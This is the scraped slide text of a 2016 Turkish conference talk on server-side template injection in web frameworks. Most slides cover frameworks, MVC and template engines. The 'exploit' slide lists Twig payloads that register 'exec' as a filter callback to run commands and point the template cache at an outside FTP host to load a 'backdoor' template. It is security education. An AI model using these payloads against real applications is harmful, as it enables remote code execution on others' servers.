Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Web Çatı Şablonlarının Güvenliği (SSTI) - Özgür Web Günleri 2016

559 views

Published on

Web Çatı Şablonlarının Güvenliği (SSTI) - Özgür Web Günleri 2016

Published in: Engineering
  • Be the first to comment

Web Çatı Şablonlarının Güvenliği (SSTI) - Özgür Web Günleri 2016

  1. 1. Web Çatı Şablonlarının Güvenliği (SSTI) Ömer Çıtak Özgür Web Teknolojileri Günleri 2016 - www.ozgurwebgunleri.org.tr www.omercitak.com
  2. 2. whoami Security Researcher @ Netsparker Ltd. Developer @ Geri kalan zamanlarda Writer @ Ethical Hacking “Offensive & Defensive” Book Blog: omercitak.com All Social Platform: @Om3rCitak
  3. 3. quesitions 1. Asp.net or PHP?
  4. 4. quesitions 1. Asp.net or PHP? 2. Asp or Laravel?
  5. 5. quesitions 1. Asp.net or PHP? 2. Asp or Laravel? 3. Laravel or Smarty?
  6. 6. quesitions 1. Asp.net or PHP? 2. Asp or Laravel? 3. Laravel or Smarty? 4. Smarty or Asp?
  7. 7. quesitions 1. Asp.net or PHP? 2. Asp or Laravel? 3. Laravel or Smarty? 4. Smarty or Asp?
  8. 8. why using framework?
  9. 9. why using framework? ● Spaghetti Code (functions.php) :P
  10. 10. why using framework? ● Spaghetti Code (functions.php) :P ● Enforcing Coding Standart
  11. 11. why using framework? ● Spaghetti Code (functions.php) :P ● Enforcing Coding Standart ● Pretty URLs
  12. 12. why using framework? ● Spaghetti Code (functions.php) :P ● Enforcing Coding Standart ● Pretty URLs ● Much of the code in less time
  13. 13. why using framework? ● Spaghetti Code (functions.php) :P ● Enforcing Coding Standart ● Pretty URLs ● Much of the code in less time ● MVC or other models
  14. 14. why using framework?
  15. 15. what is the MVC?
  16. 16. what is the MVC?
  17. 17. what is the MVC?
  18. 18. what is the VIEW layer?
  19. 19. what is the VIEW layer? Template Engines; ● Twig ● Smarty ● Blade ● Volt ● Mustache ● etc...
  20. 20. twig ● registerUndefinedFilterCallback(“function_name”) ● getFilter(“filter”) ● setCache(“ftp://omercitak.com:21”) ● loadTemplate(“backdoor”)
  21. 21. exploit ● {{_self.env.registerUndefinedFilterCallback(“exec”)}} ● {{_self.env.getFilter(“ls”)}} ● {{_self.env.setCache(“ftp://omercitak.com:21”)}} ● {{_self.env.loadTemplate(“backdoor”)}}
  22. 22. demo
  23. 23. questions
  24. 24. thanks www.omercitak.com All Social Platform: @Om3rCitak

×